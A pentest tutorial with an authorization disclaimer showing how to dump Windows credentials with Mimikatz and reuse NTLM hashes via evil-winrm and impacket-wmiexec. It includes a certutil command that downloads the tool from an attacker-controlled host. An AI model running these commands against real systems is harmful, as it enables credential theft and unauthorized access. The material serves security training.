Introduction
Welcome to an in-depth tutorial on using Mimikatz to dump password hashes and perform pass-the-hash (PtH) attacks. This guide is designed to help you enhance your hacking and cybersecurity skills with practical knowledge and actionable steps.
Before diving in, it’s important to emphasize that ethical hacking is legal only when done with proper authorization. This demonstration is strictly for educational purposes, and you should always ensure you have legal permission before performing any of the actions discussed here.
Related Video:
What Is Mimikatz?
Mimikatz is a powerful open-source tool and post-exploitation framework commonly used for privilege escalation in Windows environments. With Mimikatz, you can extract plaintext passwords, hashes, PINs, and Kerberos tickets directly from memory. It is widely regarded as a critical tool for ethical hackers and penetration testers.
Getting Started with Mimikatz
Step 1: Download Mimikatz
To begin, you’ll need to download Mimikatz:
Open Google and search for "Mimikatz GitHub."
Select the official GitHub repository. Ensure you’re downloading a version compatible with the target system.
Navigate to the x64 directory (if targeting a 64-bit system) and download Mimikatz.exe as a raw file.
After downloading, verify that the file is in your system’s designated directory (e.g., Downloads folder).
Setting Up Mimikatz on the Target System
Step 2: Establish an Administrator Shell
Before using Mimikatz, you must gain administrative-level access to the target system. This involves obtaining a shell and escalating privileges, which is a prerequisite for post-exploitation tools like Mimikatz. For this tutorial, we’ll assume you already have an administrative shell.
Step 3: Transfer Mimikatz to the Target System
One of the easiest ways to transfer files from your Kali Linux system to the target system is by hosting an HTTP server using Python:
Open your terminal and navigate to the directory containing Mimikatz.exe.
Start an HTTP server using the command:
python3 -m http.server 80On the target system, use certutil to download the file:
certutil -urlcache -f http://<Kali_IP>/Mimikatz.exe Mimikatz.exeReplace <Kali_IP> with your Kali Linux machine’s IP address. Upon successful transfer, verify that Mimikatz.exe is on the target system.
Using Mimikatz
Step 4: Run Mimikatz
Navigate to the directory where Mimikatz.exe is located and run it:
.\Mimikatz.exeIf successful, the Mimikatz command prompt will appear.
Step 5: Elevate Privileges
To ensure Mimikatz functions properly, elevate privileges using:
privilege::debugIf this returns Privilege 20, you’re ready to proceed. Note that administrative privileges are mandatory.
Step 6: Dump Password Hashes
Use the following command to extract logon credentials:
sekurlsa::logonpasswordsDepending on the system’s configuration, you may see NTLM hashes, plaintext passwords, or no results. NTLM hashes are typically used in PtH attacks.
Conducting Pass-the-Hash Attacks
Pass-the-hash attacks authenticate users to systems without requiring plaintext passwords, using only the captured hash.
Using WinRM (Windows Remote Management)
For PtH attacks with WinRM, use the built-in Kali Linux tool Evil-WinRM:
evil-winrm -i <Target_IP> -u <Username> -H <Hash>Replace <Target_IP> with the target’s IP, <Username> with the username, and <Hash> with the NTLM hash. Once authenticated, you will gain access as the specified user.
Ensure the target system has WinRM enabled (typically on port 5985).
Using SMB (Server Message Block)
For PtH attacks using SMB, employ the Impacket tool:
impacket-wmiexec -hashes <Hash>: -username <Username> <Target_IP>Ensure the target system has SMB enabled (typically on port 445).
Conclusion
This tutorial covered the essentials of using Mimikatz to extract password hashes and conduct pass-the-hash attacks using WinRM and SMB. While this guide focused on the basics, Mimikatz offers advanced functionalities for more complex scenarios.
If you’re interested in learning how to crack the hashes extracted with Mimikatz, check out my tutorial on password cracking with Hashcat and JohnTheRipper.
Happy hacking!